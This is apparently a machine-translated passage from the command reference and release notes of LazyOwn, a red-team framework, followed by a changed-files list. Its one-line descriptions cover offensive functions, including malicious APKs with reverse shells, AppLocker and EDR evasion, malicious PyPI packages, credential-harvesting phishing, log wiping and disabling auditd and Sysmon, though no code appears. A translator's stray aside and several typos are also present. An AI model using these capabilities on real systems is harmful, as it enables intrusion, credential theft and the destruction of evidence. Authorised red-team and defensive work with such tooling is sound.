Применить шифр подстановки ROT (вращение) к заданному расширению.
rrhostФаза: misc | Источник: cli/commands/misc_migrated.py
Обновляет приглашение командной строки, чтобы включить удалённый хост (self.params['rhost']) и текущую рабочую директорию.
runФаза: misc | Источник: cli/commands/misc_migrated.py
Запускает конкретный скрипт LazyOwn или активный модуль.
scansФаза: misc | Источник: cli/commands/misc_migrated.py
Список файлов сканирования nmap в sessions/ с возрастом, размером и открытыми портами.
scopeФаза: misc | Источник: cli/commands/misc_migrated.py
Управление авторизованной областью взаимодействия и режимом защиты области.
searchФаза: misc | Источник: cli/commands/module_manager.py
Поиск модулей по имени, описанию или автору.
shФаза: misc | Источник: cli/commands/misc_migrated.py
Выполняет shell-команду непосредственно из интерфейса LazyOwn.
share_findingФаза: misc | Источник: cli/commands/collboration.py (в оригинале collaboration.py, но в тексте опечатка? Проверю: в исходнике было cli/commands/collaboration.py — да, в тексте collaboration.py. Оставляю как есть.)
Поделиться находкой или обнаруженными учётными данными с командой.
showФаза: misc | Источник: cli/commands/misc_migrated.py
Показать параметры, модули, полезные нагрузки или параметры активного модуля.
sitrepФаза: misc | Источник: cli/commands/misc_migrated.py
Вывести единую сводку оперативной обстановки.
spoolФаза: misc | Источник: cli/commands/resource_scripting.py
Записать вывод сесии в файл.
stealth_offФаза: misc | Источник: cli/commands/pwn.py
Отключить режим сктности.
suggest_nextФаза: misc | Источник: cli/commands/misc_migrated.py
Предложить следующие команды, обходя граф от недавней активности.
sysФза: misc | Источник: cli/commands/misc_migrated.py
Выполняет shell-команду непосредственно из интерфейса LazyOwn.
tabФаза: misc | Источник: cli/commands/misc_migrated.py
Выполняет скрипт lazypyautogui.py с необязательными аргументами.
tasksФаза: misc | Источник: cli/commands/misc_migrated.py
Просмотр и управление очередью задач из sessions/tasks.json.
team_chatФаза: misc | Источник: cli/commands/collaboration.py
Отправить сообщение всем подключённым операторам.
team_statusФза: misc | Источник: cli/commands/collaboration.py
Показать статус всех членов команды.
Phase: misc | Source: cli/commands/collaboration.py
Показать активных операторов и целевые блокировки.
tenantPhase: misc | Source: cli/commands/misc_migrated.py
Управление мультиарендностью: список, переключение или создание арендаторов для вовлечений.
tgrepPhase: misc | Source: cli/commands/misc_migrated.py
Поиск по всем предыдущим выводам команд и журналам сессий.
timeline_browserPhase: misc | Source: cli/commands/misc_migrated.py
Открыть таймлайн-скраббер по CSV-отчёту сессии.
toast_clearPhase: misc | Source: cli/commands/misc_migrated.py
Пометить все ожидающие toast-события как просмотренные без их вывода.
ttp_matrixPhase: misc | Source: cli/commands/caldera.py
Отобразить матрицу покрытия MITRE ATT&CK по всем операциям.
ttp_rebuildPhase: misc | Source: cli/commands/caldera.py
Повторно пройти по каталогу операций для обновления матрицы покрытия.
ttp_showPhase: misc | Source: cli/commands/caldera.py
Показать детали по одной технике MITRE.
tui_themePhase: misc | Source: cli/commands/misc_migrated.py
Переключить цветовую тему TUI, используемую в заставке и стилизованном выводе.
unlock_targetPhase: misc | Source: cli/commands/collaboration.py
Снять рекомендательную блокировку с цели.
urldecodePhase: misc | Source: cli/commands/misc_migrated.py
Декодировать URL-закодированную строку.
urlencodePhase: misc | Source: cli/commands/misc_migrated.py
Закодировать строку для URL.
usePhase: misc | Source: cli/commands/module_manager.py
Выбрать модуль для работы.
vPhase: misc | Source: cli/commands/misc_migrated.py
Открыть новое окно в tmux-сессии с использованием LazyOwn RedTeam Framework.
whoamiPhase: misc | Source: cli/commands/cli_auth.py
Показать текущего авторизованного оператора CLI.
wizardPhase: misc | Source: cli/commands/misc_migrated.py
Интерактивный мастер первичной настройки — настройка rhost, lhost, домена, словарей и другого.
lazy_payload_keysPhase: diagnostics | Source: cli/commands/diagnostics.py
Список ключей, присутствующих в полезной нагрузке родительской оболочки.
lazy_runtimePhase: diagnostics | Source: cli/commands/diagnostics.py
Вывести интерпретатор, платформу и основные пути LazyOwn.
GETPhase: uncategorized | Source: cli/commands/phishing_wizard.py
Описание недоступно.
OPTIONSPhase: uncategorized | Source: cli/commands/phishing_wizard.py
Описание недоступно.
POSTPhase: uncategorized | Source: cli/commands/phishing_wizard.py
Описание недоступно.
adcs_escPhase: uncategorized | Source: cli/commands/active_directory.py
Проверить службы сертификатов Active Directory на уязвимости ESC1-ESC13.
ai_playbookPhase: uncategorized | Source: cli/commands/ai.py
Сгенерировать наступательный плейбук из Nmap CSV + KB + Ollama.
ai_togglePhase: uncategorized | Source: cli/commands/ai.py
Включить или выключить встроенного ИИ-ассистента.
android_apkPhase: uncategorized | Source: cli/commands/mobile_macos.py
Сгенерировать вредоносный APK с полезной нагрузкой reverse shell.
android_enumPhase: uncategorized | Source: cli/commands/mobile_macos.py
Перечислить Android-устройство, подключённое через ADB.
applocker_cscPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать обход AppLocker через компиляцию и выполнение csc.exe.
applocker_installutilPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать полезную нагрузку для обхода AppLocker через InstallUtil.exe.
applocker_msbuildPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать полезную нагрузку для обхода AppLocker через MSBuild.exe.
applocker_mshtaPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать полезную нагрузку для обхода AppLocker через mshta.exe.
applocker_presentationPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать ссылку для обхода AppLocker через PresentationHost.exe.
applocker_regsvcsPhase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать полезную нагрузку для обхода AppLocker через Regsvcs.exe/Regasm.exe.
applocker_rundll32Phase: uncategorized | Source: cli/commands/applocker_bypass.py
Сгенерировать обход AppLocker через rundll32.exe с помощью SCT-скриптлета.
arsenal_showPhase: uncategorized | Source: cli/commands/payload_arsenal.py
Показать элементы арсенала полезных нагрузок.
askPhase: uncategorized | Source: cli/commands/ai.py
Задать вопрос ИИ с предварительно загруженным контекстом текущей сессии.
attack_surfacePhase: uncategorized | Source: cli/commands/reporting.py
Сформировать сводку поверхности атаки на основе данных разведки.
audit_complete_keysPhase: uncategorized | Source: cli/commands/audit.py
Вывести подсказки автодополнения с учётом полезных нагрузок для частичной команды.
auditd_disablePhase: uncategorized | Source: cli/commands/opsec_cleanup.py
Сгенерировать команды для отключения Linux auditd.
auto_loopPhase: uncategorized | Source: cli/commands/mcp_bridge.py
Запустить цель через автономный оркестратор в фоновом режиме.
auto_populatePhase: uncategorized | Source: cli/commands/mcp_bridge.py
Разобрать последний XML-скан nmap и автоматически заполнить контекст полезных нагрузок.
autopivotPhase: uncategorized | Source: cli/commands/pivoting.py
Автоматически обнаружить внутренние сети и настроить туннели для pivoting.
aws_privescPhase: uncategorized | Source: cli/commands/cloud_attacks.py
Повышение привилегий и перечисление в AWS.
bof_catalogPhase: uncategorized | Source: cli/commands/bof_registry.py
Перечислить все BOF, доступные в курируемом каталоге.
bof_infoPhase: uncategorized | Source: cli/commands/bof_registry.py
Показать подробную информацию о BOF.
bof_installPhase: uncategorized | Source: cli/commands/bof_registry.py
Установить и скомпилировать BOF, подготовив его для доставки через beacon.
bof_listPhase: uncategorized | Source: cli/commands/bof_registry.py
Перечислить все установленные и подготовленные BOF.
bof_runPhase: uncategorized | Source: cli/commands/bof_registry.py
Выполнить BOF на подключённом beacon.
bof_searchPhase: uncategorized | Source: cli/commands/bof_registry.py
Поиск BOF в каталоге по ключевому слову.
bof_uninstallPhase: uncategorized | Source: cli/commands/bof_registry.py
Удалить BOF и убрать его подготовленный файл.
c2_dnsPhase: uncategorized | Source: cli/commands/c2_profile.py
Настроить или отобразить DNS-профиль beacon.
c2_profilesPhase: uncategorized | Source: cli/commands/c2_profile.py
Перечислить все доступные транспортные профили C2.
c2_rotatePhase: uncategorized | Source: cli/commands/c2_profile.py
Переключиться на следующий транспортный профиль C2 в очереди ротации.
c2_tlsPhase: uncategorized | Source: cli/commands/c2_profile.py
Отобразить текущий TLS-профиль C2.
campaign_sitrepPhase: uncategorized | Source: cli/commands/mcp_bridge.py
Псевдоним sitrep, сохранённый для согласованности с MCP-глаголами (lazyown_campaign_sitrep).
cicd_scanPhase: uncategorized | Source: cli/commands/cicd.py
Сканировать CI/CD-платформу на предмет ошибок безопасности.
cicd_secretsPhase: uncategorized | Source: cli/commands/cicd.py
Сканировать журнал сборки на предмет утёкших секретов.
clean_adPhase: uncategorized | Source: cli/commands/anti_forensics.py
Очистить журналы событий Active Directory и кэшированные билеты Kerberos.
cloud_bucketsPhase: uncategorized | Source: cli/commands/cloud.py
Перечислить облачные хранилища для заданного префикса.
cloud_enumPhase: uncategorized | Source: cli/commands/cloud.py
Перечислить метаданные облачного провайдера, хранилища и IAM.
cloud_iamPhase: uncategorized | Source: cli/commands/cloud.py
Перечислить роли и политики IAM в облаке.
cloud_metadataPhase: uncategorized | Source: cli/commands/cloud.py
Собрать метаданные облачного инстанса (AWS IMDS, Azure, GCP).
cloud_scanPhase: uncategorized | Source: cli/commands/cloud.py
Полное сканирование облачной безопасности: метаданные + хранилища + перечисление IAM.
container_detectPhase: uncategorized | Source: cli/commands/containers.py
Автоматически определить среду выполнения контейнера и примитивы для побега.
container_escapePhase: uncategorized | Source: cli/commands/containers.py
Проверить текущий контейнер на известные векторы побега.
cover_tracksФаза: без категории | Источник: cli/commands/anti_forensics.py
Выполнить все операции анти-форензики последовательно.
crack_hashesФаза: без категории | Источник: cli/commands/security.py
Взломать хэши паролей из файла с помощью John the Ripper или Hashcat.
cross_cloudФаза: без категории | Источник: cli/commands/cloud_attacks.py
Атаки на федерацию удостоверений между облаками.
dacl_abuseФаза: без категории | Источник: cli/commands/active_directory.py
Перечислить и использовать опасные записи DACL/SACL в Active Directory.
delegation_attackФаза: без категории | Источник: cli/commands/active_directory.py
Показать вычисленные пути атак через делегирование с командами эксплуатации.
delegation_enumФаза: без категории | Источник: cli/commands/active_directory.py
Перечислить конфигурации делегирования Kerberos.
depconfuseФаза: без категории | Источник: cli/commands/supply_chain.py
Сканировать requirements.txt на предмет кандидатов для путаницы зависимостей.
depscanФаза: без категории | Источник: cli/commands/supply_chain.py
Сканировать дерево каталогов на файлы зависимостей и отмечать риски.
detect_edrФаза: без категории | Источник: cli/commands/evasive_payload.py
Сгенерировать команды для обнаружения EDR/AV на цели.
docker_enumФаза: без категории | Источник: cli/commands/containers.py
Перечислить Docker-хост: контейнеры, образы, привилегии, монтирования.
dotnet_payloadФаза: без категории | Источник: cli/commands/payload_arsenal.py
Сгенерировать полезную нагрузку .NET/C#.
edr_detectФаза: без категории | Источник: cli/commands/edr_detect.py
Обнаружить продукты EDR/AV на цели.
edr_profileФаза: без категории | Источник: cli/commands/edr_detect.py
Сгенерировать профиль обхода на основе обнаруженного EDR.
edr_scriptФаза: без категории | Источник: cli/commands/edr_detect.py
Сгенерировать PowerShell-скрипт для обнаружения EDR.
entra_attackФаза: без категории | Источник: cli/commands/cloud_attacks.py
Атаки на Microsoft Entra ID / Azure AD.
evasionФаза: без категории | Источник: cli/commands/evasive_payload.py
Сгенерировать и управлять профилями обхода C2.
evasiveФаза: без категории | Источник: cli/commands/evasive_payload.py
Сгенерировать полезные нагрузки, обходящие обнаружение, с несколькими стратегиями обфускации.
evasive_payloadФаза: без категории | Источник: cli/commands/evasive_payload.py
Сгенерировать обходную полезную нагрузку с автоматическим обходом AV/EDR.
event_logФаза: без категории | Источник: lazyown.py
Показать недавние события EventBus. Использование: event_log [N] [category]
facts_showФаза: без категории | Источник: cli/commands/mcp_bridge.py
Показать структурированные факты, извлеченные из сканирования nmap и вывода инструментов.
forensic_cleanФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Очистить артефакты форензики — Prefetch, Shimcache, Amcache, Jump Lists и т.д.
formФаза: без категории | Источник: cli/commands/audit.py
Открыть интерактивную форму для известной команды. Использование: form .
fzФаза: без категории | Источник: cli/commands/audit.py
Нечеткий поиск команд. Использование: fz [query]. Пустой список выводит все команды.
gcp_privescФаза: без категории | Источник: cli/commands/cloud_attacks.py
Повышение привилегий и перечисление в GCP.
gitlab_enumФаза: без категории | Источник: cli/commands/cicd.py
Перечислить экземпляр GitLab.
gpo_abuseФаза: без категории | Источник: cli/commands/active_directory.py
Перечислить и использовать объекты групповой политики.
grep_logФаза: без категории | Источник: cli/commands/audit.py
Поиск по последним выводам команд. Использование: grep_log [--cmd ].
groqФаза: без категории | Источник: cli/commands/ai.py
Отправить запрос в API Groq, используя настроенный api_key.
jenkins_enumФаза: без категории | Источник: cli/commands/cicd.py
Перечислить экземпляр Jenkins.
k8s_attackФаза: без категории | Источник: cli/commands/cloud_attacks.py
Атака на Kubernetes — перечисление RBAC, побег из пода, etcd, постоянство.
k8s_enumФаза: без категории | Источник: cli/commands/containers.py
Перечислить кластер Kubernetes: поды, секреты, SA, RBAC.
k8s_podsФаза: без категории | Источник: cli/commands/containers.py
Перечислить кластер Kubernetes: поды, секреты, SA, RBAC. Перечислить поды Kubernetes с деталями, важными для безопасности.
k8s_secretsФаза: не классифицировано | Источник: cli/commands/containers.py
Перечислить и декодировать секреты Kubernetes.
kerberoastФаза: не классифицировано | Источник: cli/commands/active_directory.py
Продвинутый Kerberoasting — режим только AES, целевой перебор SPN.
kerberos_ticketФаза: не классифицировано | Источник: cli/commands/active_directory.py
Создавать билеты Kerberos для закрепления и горизонтального перемещения.
linux_advanced_payloadФаза: не классифицировано | Источник: cli/commands/payload_arsenal.py
Генерировать продвинутые полезные нагрузки для Linux (LD_PRELOAD, eBPF, PAM, модуль ядра).
llm_budgetФаза: не классифицировано | Источник: cli/commands/ai.py
Показать дневной бюджет затрат LLM, лимит токенов на вызов и текущие расходы.
log_tamperФаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py
Команды очистки журналов для разных платформ.
macos_keychainФаза: не классифицировано | Источник: cli/commands/mobile_macos.py
Извлечь секреты из связки ключей macOS.
macos_payloadФаза: не классифицировано | Источник: cli/commands/payload_arsenal.py
Генерировать полезные нагрузки для macOS (пакеты .app, закрепление, обход TCC).
macos_persistФаза: не классифицировано | Источник: cli/commands/mobile_macos.py
Генерировать закрепление в macOS через LaunchAgent.
macos_tccФаза: не классифицировано | Источник: cli/commands/mobile_macos.py
Генерировать обход TCC (Transparency, Consent, Control) в macOS.
memory_cleanФаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py
Очистить артефакты памяти — билеты Kerberos, буфер обмена, переменные окружения, учётные данные.
mfa_bypassФаза: не классифицировано | Источник: cli/commands/cicd.py
Перечислить и протестировать методы обхода MFA.
mutate_shellcodeФаза: не классифицировано | Источник: cli/commands/evasive_payload.py
Применить полиморфную мутацию к шеллкоду для обхода сигнатур.
network_opsecФаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py
Сетевая OPSEC — цепочки прокси, DoH, обнаружение канареек, анализ трафика.
opsecФаза: не классифицировано | Источник: cli/commands/security.py
Оценить риск OPSEC для команды LazyOwn перед выполнением.
opsec_scoreФаза: не классифицировано | Источник: cli/commands/opsec_cleanup.py
Оценка риска OPSEC в реальном времени с контекстным блокированием действий (v2).
orchestrateФаза: не классифицировано | Источник: cli/commands/orchestration.py
Направить цель через единый оркестратор и вывести результат.
package_squatФаза: не классифицировано | Источник: cli/commands/supply_chain.py
Сгенерировать вредоносный пакет PyPI для путаницы зависимостей.
parquet_queryФаза: не классифицировано | Источник: cli/commands/mcp_bridge.py
Запросить базы знаний parquet (GTFOBins, LOLBas, ATT&CK, сессии).
pentest_reportФаза: не классифицировано | Источник: cli/commands/reporting.py
Сгенерировать профессиональный отчёт о пентесте.
phish_reportФаза: не классифицировано | Источник: cli/commands/phishing_wizard.py
Показать результаты кампании и перехваченные учётные данные.
phish_serveФаза: не классифицировано | Источник: cli/commands/phishing_wizard.py
Запустить лёгкий HTTP-сервер для фишинговых целевых страниц.
phish_wizardФаза: не классифицировано | Источник: cli/commands/phishing_wizard.py
Интерактивный мастер фишинговой кампании от начала до конца.
pivot_killФаза: не классифицировано | Источник: cli/commands/pivoting.py
Убить все туннели пивота и выполнить очистку.
pivot_proxyФаза: не классифицировано | Источник: cli/commands/pivoting.py
Запустить локальный SOCKS-прокси через цепочку пивота.
pivot_scanФаза: не классифицировано | Источник: cli/commands/pivoting.py
Сканировать внутренние сети через текущую цепочку пивота.
pivot_statusФаза: не классифицировано | Источник: cli/commands/pivoting.py
Показать текущее состояние цепочки пивота.
playbook_runФаза: не классифицировано | Источник: cli/commands/mcp_bridge.py
Выполнить сгенерированный YAML-плейбук шаг за шагом через оболочку.
polymorphicФаза: не классифицировано | Источник: cli/commands/payload_arsenal.py
Применить полиморфную мутацию к шеллкоду.
rag_queryФаза: не классифицировано | Источник: cli/commands/mcp_bridge.py
Семантический поиск по артефактам сессии (сканы, журналы, заметки).
reload_addonsФаза: без категории | Источник: cli/commands/audit.py
Повторное сканирование lazyaddons/ и plugins/ на предмет изменений; перезагружает новые элементы.
rotate_aesФаза: без категории | Источник: cli/commands/security.py
Сгенерировать новый AES-ключ и перешифровать все запечатанные учетные данные.
routeФаза: без категории | Источник: lazyown.py
Направлять естественно-языковый запрос к инструменту LazyOwn. Использование: route
saas_enumФаза: без категории | Источник: cli/commands/cloud_attacks.py
Перечисление SaaS-платформ — M365, Google Workspace, Salesforce, Slack, ServiceNow.
seal_credentialsФаза: без категории | Источник: cli/commands/security.py
Зашифровать все чувствительные значения в payload.json с помощью AES-256-GCM.
session_stateФаза: без категории | Источник: cli/commands/mcp_bridge.py
Псевдоним sitrep, сохранённый для паритета глаголов MCP (lazyown_session_state).
setФаза: без категории | Источник: lazyown.py
Установить параметр — единый интерфейс set/assign.
shredФаза: без категории | Источник: cli/commands/anti_forensics.py
Безопасно удалять файлы, перезаписывая их перед удалением.
sleep_configureФаза: без категории | Источник: cli/commands/sleep_obfuscation.py
Настроить активную технику обфускации сна.
sleep_infoФаза: без категории | Источник: cli/commands/sleep_obfuscation.py
Показать подробную информацию о технике обфускации сна.
sleep_listФаза: без категории | Источник: cli/commands/sleep_obfuscation.py
Список доступных техник обфускации сна.
socks_configФаза: без категории | Источник: cli/commands/socks_proxy.py
Показать или настроить SOCKS5-прокси.
socks_exportФаза: без категории | Источник: cli/commands/socks_proxy.py
Экспорт спецификации SOCKS5-прокси для доставки beacon.
socks_sessionsФаза: без категории | Источник: cli/commands/socks_proxy.py
Список активных SOCKS-прокси сессий.
staged_deliveryФаза: без категории | Источник: cli/commands/payload_arsenal.py
Генерация артефактов поэтапной доставки (HTA, VBA, LNK, ISO, VHD).
state_snapshotФаза: без категории | Источник: lazyown.py
Показать единый снимок StateManager (БД + JSON-кэши).
status_barФаза: без категории | Источник: cli/commands/orchestration.py
Просмотр, переключение и обновление строки состояния приглашения.
status_tailФаза: без категории | Источник: cli/commands/audit.py
Вывод живого прогресса из последних файлов sessions/scan_*.partial.
sysmon_disableФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Генерация команд для отключения Windows Sysmon.
threat_modelФаза: без категории | Источник: cli/commands/mcp_bridge.py
Построение или проверка модели угроз, полученной из событий сессии.
timelineФаза: без категории | Источник: cli/commands/mcp_bridge.py
Псевдоним timeline_browser, сохранённый для паритета глаголов MCP (lazyown_timeline).
timestompФаза: без категории | Источник: cli/commands/opsec_cleanup.py
Манипулирование временными метками MACB файлов для обхода судебного анализа временной шкалы.
unseal_credentialsФаза: без категории | Источник: cli/commands/security.py
Расшифровать запечатанные значения учетных данных в payload.json для проверки.
vuln_listФаза: без категории | Источник: cli/commands/reporting.py
Список обнаруженных уязвимостей из базы данных сессий.
wipe_freeФаза: без категории | Источник: cli/commands/anti_forensics.py
Затирание свободного дискового пространства для предотвращения судебного восстановления файлов.
wipe_logsФаза: без категории | Источник: cli/commands/anti_forensics.py
Очистка системных журналов на удаленной цели.
wipe_timelineФаза: без категории | Источник: cli/commands/anti_forensics.py
Затирание временных меток файлов и истории оболочки на цели.
* * функция (feat): новая модель мира как источник истины для цепочки атак (kill chain) для запуска отдельных фаз
Версия: release/0.2.160
с любовью к дашбордам маркетплейса, новому графу GUI2, правилам YARA, реализованным правилам Nuclei и т.д.
Изменённые файлы:
- .coverage - AGENTS.md - CLAUDE.md - README.md - cli/command_chain.py - cli/commands/bof_registry.py - cli/commands/c2_profile.py - cli/commands/cred_migrated.py - cli/commands/dns_exfil.py - cli/commands/enum.py - cli/commands/estorides.py - cli/commands/exploit_migrated.py - cli/commands/lateral_migrated.py - cli/commands/misc_migrated.py - cli/commands/persist_migrated.py - cli/commands/postexp_migrated.py - cli/commands/privilege_escalation.py - cli/commands/report.py - cli/commands/report_migrated.py - cli/commands/scan_migrated.py - cli/commands/security.py - cli/commands/sleep_obfuscation.py - cli/commands/socks_proxy.py - cli/dashboard_tui.py - cli/engagement_hooks.py - cli/killchain.py - cli/ops_commands.py - cli/reactive_hints.py - cli/recommendation.py - cli/recommendation_signals.py - cli/tips_engine.py - config.json - fast_run_as_r00t.sh - lazyaddons/blacksandbeacon.yaml - lazyaddons/estorides.yaml - lazyc2.py - lazygui/app.py - lazygui/config/c2_credentials.py - lazygui/config/constants.py - lazygui/config/paths.py - lazygui/config/settings.py - lazygui/panels/init.py - lazygui/panels/campaign_panel.py - lazygui/panels/cve_panel.py - lazygui/panels/graph_panel.py - lazygui/panels/history_panel.py - lazygui/panels/killchain_panel.py - lazygui/panels/marketplace_panel.py - lazygui/panels/registry.py - lazygui/panels/sessions_panel.py - lazygui/panels/terminal_panel.py - lazygui/services/init.py - lazygui/services/backend.py - lazygui/services/models.py - lazygui/services/teamserver_backend.py - lazygui/widgets/init.py - lazygui/widgets/beacon_command_modal.py - lazygui/widgets/graph_view.py - lazygui/widgets/terminal_view.py - lazygui/windows/connect_dialog.py - lazygui/windows/main_window.py - lazyown.py - modules/beacon_config_builder.py - modules/beacon_history.py - modules/bof_registry.py - modules/c2_builder.py - modules/c2_profile_engine.py - modules/conditional_hooks.py - modules/estorides_importer.py - modules/gui.py - modules/kill_chain_viz.py - modules/killchain.py - modules/lazyown_bridge.py - modules/report_templates.py - modules/sessions/llm_budget.json - modules/sleep_obfuscation.py - modules/socks_proxy.py - modules/world_model.py - sessions/implant/implant_crypt.go - sessions/implant/stub.c - sessions/implant/stub_lin.c - sessions/phishing/campaigns/short_urls.json - skills/hermes-lazyown/constants.py - templates/index.html - templates/nav.html - tests/run_mutation_killchain.py - tests/test_beacon_config_builder.py - tests/test_beacon_history.py - tests/test_bof_registry.py - tests/test_c2_profile_engine.py - tests/test_categories.py - tests/test_command_set_migration.py - tests/test_conditional_hooks_extended.py - tests/test_killchain_auto_refresh.py - tests/test_killchain_gap_signal.py - tests/test_killchain_snapshot.py - tests/test_killchain_unified.py - tests/test_killchain_unified_v2.py - tests/test_lazygui_backend.py - tests/test_lazygui_graph_widget.py - tests/test_lazygui_models.py - tests/test_ops_loot_phase.py - tests/test_sleep_obfuscation.py - tests/test_socks_proxy.py - tests/test_world_model_extended.py - users.json - utils.py
Созданные файлы:
- .coverage - cli/commands/bof_registry.py - cli/commands/c2_profile.py - cli/commands/estorides.py - cli/commands/sleep_obfuscation.py - cli/commands/socks_proxy.py - lazygui/config/c2_credentials.py - lazygui/panels/campaign_panel.py - lazygui/panels/cve_panel.py - lazygui/panels/graph_panel.py - lazygui/panels/history_panel.py - lazygui/panels/marketplace_panel.py - lazygui/widgets/beacon_command_modal.py - lazygui/widgets/graph_view.py - modules/beacon_config_builder.py - modules/beacon_history.py - modules/bof_registry.py - modules/c2_profile_engine.py - modules/estorides_importer.py - modules/killchain.py - modules/sleep_obfuscation.py - modules/socks_proxy.py - tests/run_mutation_killchain.py - tests/test_beacon_config_builder.py - tests/test_beacon_history.py - tests/test_bof_registry.py - tests/test_c2_profile_engine.py - tests/test_categories.py - tests/test_conditional_hooks_extended.py - tests/test_killchain_auto_refresh.py - tests/test_killchain_gap_signal.py - tests/test_killchain_snapshot.py - tests/test_killchain_unified.py - tests/test_killchain_unified_v2.py - tests/test_lazygui_backend.py - tests/test_lazygui_graph_widget.py - tests/test_lazygui_models.py - tests/test_sleep_obfuscation.py - tests/test_socks_proxy.py - tests/test_world_model_extended.py
LazyOwn на HackTheBox: https://app.hackthebox.com/teams/overview/6429
LazyOwn/ https://grisuno.github.io/LazyOwn/
Дата: пн 03 авг 2026 00:02:10 -04
Время: 1785729730
* * команда privesc :D
* * фаза киллчейна с единым источником правды
* * фаза киллчейна с единым источником правды
* * 1. src/page_view.c — пробел между и (текстовый узел, родитель которого //
) выводился как случайный